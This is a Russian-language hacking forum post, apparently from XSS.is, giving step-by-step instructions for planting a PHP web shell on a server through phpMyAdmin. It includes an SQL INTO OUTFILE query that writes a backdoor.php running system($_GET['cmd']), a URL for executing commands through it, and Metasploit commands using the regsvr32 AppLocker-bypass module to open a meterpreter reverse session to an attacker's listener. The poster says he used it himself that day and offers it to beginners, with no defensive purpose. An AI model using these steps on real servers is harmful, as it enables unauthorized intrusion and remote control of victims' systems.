• XSS.stack #1 – первый литературный журнал от юзеров форума

Загрузка shell на сервер через PhpMyAdmin

pablo

(L2) cache
Пользователь
Регистрация
01.02.2019
Сообщения
433
Реакции
1 524
Старая добрая загрузка шелла на сервер через имеющийся PhpMyAdmin. Ничего нового, но новичкам напоминание в копилочку. сам сегодня заюзал, решил напомнить

1. создаем базу или идем в имеющуюся
2. Затем, выбрав эту базу данных, идем в поле SQL, выполняем SQL запрос.
Код:
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “\ваш путь\backdoor.php”
3. попробуем обратиться к серверу по заданному пути и названию site.ru/backdoor.php
4. выполнение команд
Код:
site.ru/backdoor.php?cmd=systeminfo
5. если нужно получить активную сессию meterpreter , тогда запускаем Msfconsole и используем следующий эксплоит:
Код:
use exploit/windows/misc/regsvr32_applocker_bypass_server
set lhost 172.16.0.192
set lport 4444
exploit
6. полученный результат работы экспа добавляем в команду:
Код:
site.ru/backdoor.php?cmd=полученный результат
7. получаем активную сессию meterpreter.

Новое - хорошо забытой старое ;)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх